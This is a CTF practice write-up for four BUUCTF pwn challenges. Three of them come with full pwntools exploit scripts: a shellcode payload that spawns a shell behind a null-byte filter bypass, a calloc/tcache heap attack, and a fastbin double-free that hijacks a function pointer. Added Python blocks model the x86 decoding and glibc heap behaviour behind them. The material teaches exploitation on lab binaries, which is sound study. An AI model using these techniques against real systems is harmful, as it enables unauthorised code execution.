PWN-PRACTICE-BUUCTF-27
- starctf_2019_babyshell
- picoctf_2018_buffer overflow 0
- gyctf_2020_signin
- bjdctf_2020_YDSneedGrirlfriend
starctf_2019_babyshell
Get past the shellcode check with a leading \x00; the program then does call rdx, so the buffer is executed exactly as submitted. A lone \x00 byte is not a complete instruction and will fault when executed, so the prefix has to be a whole instruction whose machine code begins with 0x00. Here that is \x00\x42\x00, which decodes to add byte ptr [rdx], al: with rdx pointing at the buffer it only touches the shellcode's own first byte. Reference: x86汇编语言杂记 (x86 assembly notes).
from pwn import *
context.arch='amd64'
#context.log_level='debug'
#io=process('./starctf_2019_babyshell')
io=remote('node4.buuoj.cn',29263)
elf=ELF('./starctf_2019_babyshell')
# 00 42 00 = add byte ptr [rdx], al: starts with a null byte and its only
# memory access is [rdx], the start of this very buffer once `call rdx` runs it
shellcode=b'\x00\x42\x00'+asm(shellcraft.sh())
io.recvuntil(b'plz:\n')
io.sendline(shellcode)
io.interactive()
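To see why \x00\x42\x00 is a safe way to start the buffer, and which other 0x00-leading encodings would do, here is an added example (not code from the original post) that decodes the ModRM/SIB forms of opcode 0x00 (ADD r/m8, r8, 64-bit mode, no REX prefix) and enumerates the encodings that only touch memory through rdx. The only assumption is the one the text makes: rdx holds the buffer address when `call rdx` runs.

```python
# Added example: decode x86-64 `00 /r` (ADD r/m8, r8) encodings and list the
# ones that are safe in front of shellcode when rdx points at the buffer.
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def decode_add_rm8(code):
    """Decode one ADD r/m8, r8 instruction (opcode 0x00, no REX prefix)
    at code[0]. Returns (mnemonic, length, base, index) or None when the
    bytes do not form a complete instruction (a lone 0x00, for instance)."""
    if len(code) < 2 or code[0] != 0x00:
        return None
    modrm = code[1]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    src = REG8[reg]
    if mod == 3:                                    # register form: no memory operand
        return (f"add {REG8[rm]}, {src}", 2, None, None)
    pos, base, index, scale = 2, REG64[rm], None, 1
    disp_len = {0: 0, 1: 1, 2: 4}[mod]              # disp8 for mod=1, disp32 for mod=2
    if rm == 4:                                     # SIB byte follows
        if len(code) < 3:
            return None
        sib, pos = code[2], 3
        scale = 1 << (sib >> 6)
        idx, b = (sib >> 3) & 7, sib & 7
        index = None if idx == 4 else REG64[idx]    # index 100 means "no index"
        if b == 5 and mod == 0:                     # [index*scale + disp32], no base
            base, disp_len = None, 4
        else:
            base = REG64[b]
    elif rm == 5 and mod == 0:                      # [rip + disp32]
        base, disp_len = "rip", 4
    if len(code) < pos + disp_len:
        return None
    disp = int.from_bytes(code[pos:pos + disp_len], "little", signed=True) if disp_len else 0
    pos += disp_len
    parts = [base] if base else []
    if index:
        parts.append(f"{index}*{scale}")
    if disp or not parts:
        parts.append(hex(disp))
    return (f"add byte ptr [{' + '.join(parts)}], {src}", pos, base, index)


def rdx_only_prefixes(max_len=3):
    """Enumerate encodings of at most max_len bytes that start with 0x00 and
    touch memory only through rdx with a zero displacement. After `call rdx`,
    [rdx] is the mapped, writable first byte of the shellcode, and that byte
    (the 0x00 opcode) has already been fetched, so the add is harmless."""
    found = []
    for modrm in range(256):
        probe = bytes([0x00, modrm]) + b"\x00" * 5   # zero SIB/displacement bytes
        d = decode_add_rm8(probe)
        if d and d[1] <= max_len and d[2] == "rdx" and d[3] is None:
            found.append(probe[:d[1]])
    return found
```

decode_add_rm8(b"\x00\x42\x00") gives add byte ptr [rdx], al with length 3, the prefix used above; the two-byte form b"\x00\x02" (mod=0, rm=rdx) is the same instruction without the displacement byte and also appears in rdx_only_prefixes(). A lone b"\x00" decodes to None, which is the "a single \x00 always fails" point from the text. Encodings that go through a SIB with an index register (for example b"\x00\x04\x8a", add byte ptr [rdx + rcx*4], al) are deliberately excluded because rcx is not under the attacker's control at that point.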
picoctf_2018_buffer overflow 0
signal() registers a handler for signal 11 (SIGSEGV): when the program touches an invalid address the signal fires and sigsegv_handler runs.
vuln() has a stack buffer overflow, so overwriting the return address with an invalid address is all that is needed.
gyctf_2020_signin
calloc does not take chunks from the tcache bins (in glibc 2.27 calloc goes to _int_malloc directly, so with a full tcache bin the chunk it returns comes from the fastbin); see: gyctf_2020_signin:ubuntu18.04配合calloc产生的漏洞 (the bug that arises from calloc on Ubuntu 18.04).
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./gyctf_2020_signin")
io=remote("node4.buuoj.cn",26888)
elf=ELF("./gyctf_2020_signin")
libc=ELF("./libc-2.27-18-x64.so")

def add(index):
    io.sendlineafter(b"your choice?",b"1")
    io.sendlineafter(b"idx?\n",str(index).encode())

def edit(index,content):
    io.sendlineafter(b"your choice?",b"2")
    io.sendlineafter(b"idx?\n",str(index).encode())
    io.sendline(content)

def free(index):
    io.sendlineafter(b"your choice?",b"3")
    io.sendlineafter(b"idx?\n",str(index).encode())

def backdoor():
    io.sendlineafter(b"your choice?",b"6")

ptr=0x4040C0   # address of the global ptr in .bss

# eight allocations, then eight frees: the first seven fill the tcache bin,
# the eighth goes to the fastbin
for i in range(8):
    add(i)
for i in range(8):
    free(i)
add(8)                  # calloc: bypasses tcache
edit(7,p64(ptr-0x10))   # write ptr-0x10 through the stale index 7
backdoor()
io.interactive()
bjdctf_2020_YDSneedGrirlfriend
UAF: the pointer for a deleted entry is never cleared, so index 0 can be freed twice and then shown; the allocations that follow reuse the freed struct, and the name written last ends up where show(0) reads its function pointer, so show(0) calls the backdoor at 0x400B9C. See: bjdctf_2020_YDSneedGrirlfriend
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./bjdctf_2020_YDSneedGrirlfriend")
io=remote("node4.buuoj.cn",25051)
elf=ELF("./bjdctf_2020_YDSneedGrirlfriend")
libc=ELF("./libc-2.23.so")

def add(name_size,name):
    io.sendlineafter(b"Your choice :",b"1")
    io.sendlineafter(b"Her name size is :",str(name_size).encode())
    io.sendlineafter(b"Her name is :",name)

def free(index):
    io.sendlineafter(b"Your choice :",b"2")
    io.sendlineafter(b"Index :",str(index).encode())

def show(index):
    io.sendlineafter(b"Your choice :",b"3")
    io.sendlineafter(b"Index :",str(index).encode())

def exit_prog():   # menu option 4 (renamed so it does not shadow the builtin exit)
    io.sendlineafter(b"Your choice :",b"4")

backdoor=0x400B9C
#gdb.attach(io)
#pause()

add(0x10,b"aaaa")   # 0
add(0x10,b"bbbb")   # 1
free(0)             # the pointer is not cleared, so index 0 stays usable
free(0)             # freed a second time
add(0x20,b"cccc")
add(0x10,p64(backdoor))   # this name write lands in the freed struct of index 0
show(0)                   # show(0) now calls backdoor
io.interactive()
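Added example, not part of the original post: a toy model of the glibc front-end bins for one small size class, used to replay the heap state behind both the gyctf_2020_signin script above (calloc bypasses the tcache; glibc 2.27) and the bjdctf_2020_YDSneedGrirlfriend script (fastbin double free on glibc 2.23). The model tracks chunk labels rather than addresses, and for the second binary it assumes the hacknote-style layout the page does not spell out: each add() allocates a 0x20 struct chunk and then the name chunk, and free() releases the name first and the struct second. The tcache stash that glibc 2.26+ performs when it serves a request from a fastbin is modelled as well, since it is the other half of the calloc-versus-tcache story.

```python
# Added example: toy model of one fastbin-sized class with (glibc >= 2.26)
# or without (glibc 2.23) a tcache bin in front of it.
class ToyHeap:
    """LIFO tcache bin (capacity 7) in front of a LIFO fastbin. Chunks are
    plain labels; sizes, headers, smallbins and the top chunk are not modelled."""
    TCACHE_COUNT = 7

    def __init__(self, tcache=True):
        self.tcache_on = tcache
        self.tcache = []    # last element is the head
        self.fastbin = []   # last element is the head

    def free(self, chunk):
        if self.tcache_on and len(self.tcache) < self.TCACHE_COUNT:
            self.tcache.append(chunk)
            return "tcache"
        # the only double-free check the fastbin path makes: the chunk must
        # not already be the head of the bin ("double free or corruption (fasttop)")
        if self.fastbin and self.fastbin[-1] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fastbin.append(chunk)
        return "fastbin"

    def _int_malloc(self):
        if not self.fastbin:
            raise MemoryError("smallbin/unsorted/top chunk not modelled")
        victim = self.fastbin.pop()
        # glibc 2.26+: after serving from a fastbin, stash what is left in that
        # bin into the tcache while the tcache bin has room
        while self.tcache_on and self.fastbin and len(self.tcache) < self.TCACHE_COUNT:
            self.tcache.append(self.fastbin.pop())
        return victim

    def malloc(self):
        if self.tcache_on and self.tcache:   # malloc consults the tcache first...
            return self.tcache.pop()
        return self._int_malloc()

    def calloc(self):
        return self._int_malloc()            # ...calloc never does


def signin_sequence():
    """gyctf_2020_signin: eight add()s, eight free()s, then one more add().
    Two heaps receive the same frees; one then serves the request with
    calloc (what the binary does), the other with malloc, for contrast."""
    chunks = [f"chunk{i}" for i in range(8)]
    via_calloc, via_malloc = ToyHeap(), ToyHeap()
    placed = [via_calloc.free(c) for c in chunks]
    for c in chunks:
        via_malloc.free(c)
    return {"placed": placed,                 # 7 x "tcache", then "fastbin"
            "calloc": via_calloc.calloc(),    # chunk7, straight from the fastbin
            "malloc": via_malloc.malloc()}    # chunk6, the tcache head


def stash_sequence():
    """Nine frees (7 tcache + 2 fastbin), one malloc to make room in the
    tcache, then calloc: the returned chunk comes from the fastbin and the
    fastbin chunk left behind is stashed into the tcache, so the following
    malloc hands that one out."""
    h = ToyHeap()
    for i in range(9):
        h.free(f"chunk{i}")
    return h.malloc(), h.calloc(), h.malloc()


def ydsneedgirlfriend_sequence():
    """bjdctf_2020_YDSneedGrirlfriend on glibc 2.23 (no tcache), with the
    assumed layout from the lead-in. Returns the 0x20 chunks handed out by
    the two add() calls that follow the double free of index 0."""
    h = ToyHeap(tcache=False)
    h.free("name0"); h.free("struct0")   # first free(0):  struct0 -> name0
    h.free("name0"); h.free("struct0")   # second free(0): passes fasttop, the head alternates
    struct2 = h.malloc()                 # add(0x20,"cccc"): struct <- struct0 (its 0x30 name chunk is not modelled)
    struct3 = h.malloc()                 # add(0x10, p64(backdoor)): struct <- name0
    name3 = h.malloc()                   #   name <- struct0: the name bytes land on girlfriend[0]'s function pointer
    return struct2, struct3, name3


def immediate_double_free_is_caught():
    """free(p); free(p) with nothing in between is what the fasttop check stops."""
    h = ToyHeap(tcache=False)
    h.free("p")
    try:
        h.free("p")
    except RuntimeError:
        return True
    return False
```

signin_sequence() shows the point of the gyctf_2020_signin section: after the eight frees the tcache bin is full and chunk7 sits in the fastbin, and a calloc is served chunk7 while a malloc of the same size would have returned chunk6 from the tcache. ydsneedgirlfriend_sequence() shows why the double free in the other script survives glibc 2.23: each free(0) releases two chunks, so the bin head is never the chunk being freed, and the third allocation after it is struct0, which is still reachable through index 0 when show(0) runs.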